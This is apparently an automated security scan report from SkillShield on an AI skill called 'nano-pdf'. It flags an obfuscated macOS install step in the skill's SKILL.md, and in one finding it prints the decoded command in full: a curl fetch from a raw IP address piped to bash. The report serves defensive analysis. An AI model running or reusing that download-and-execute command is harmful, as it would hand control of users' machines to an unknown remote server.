Trust Assessment
nano-pdf received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 3 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution via Untrusted Download, Untrusted Remote Code Execution Source.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-pdf-zpgdu/SKILL.md:10 | |
| CRITICAL | Arbitrary Code Execution via Untrusted Download The skill instructs MacOS users to execute a shell command that downloads and immediately executes arbitrary code from an untrusted remote server (91.92.242.30). This allows for complete compromise of the user's system, as the downloaded script can perform any action with the user's permissions. Remove the malicious MacOS installation command. Provide a safe and verifiable installation method, preferably from a trusted package manager or a signed executable. Avoid direct execution of scripts downloaded from untrusted sources. | LLM | SKILL.md:12 | |
| CRITICAL | Untrusted Remote Code Execution Source The MacOS installation command fetches and executes a script from an unknown and untrusted IP address (91.92.242.30) without any form of verification (e.g., checksum, signature). This introduces a severe supply chain risk, as the content of the script can change at any time, potentially delivering malware or backdoors. Remove the malicious MacOS installation command. Ensure all external dependencies and installation scripts are sourced from trusted, verifiable locations (e.g., official package repositories, signed binaries, or well-known CDN domains) and include integrity checks. | LLM | SKILL.md:12 | |
| HIGH | Obfuscated Malicious Command The MacOS installation command uses base64 encoding to obfuscate the actual command being executed. The decoded command (`/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarred3txw)"`) downloads and executes arbitrary code. This obfuscation technique is often used to hide malicious intent and bypass simple security checks, making it harder for users to understand the risks before execution. Avoid using obfuscation techniques like base64 encoding for legitimate installation instructions. All commands should be clear, transparent, and easily auditable by users. If a script must be downloaded, its content should be reviewed and its source verified. | LLM | SKILL.md:12 |
Scan History
Embed Code
[](https://skillshield.io/report/6da7051c9c859c3d)
Powered by SkillShield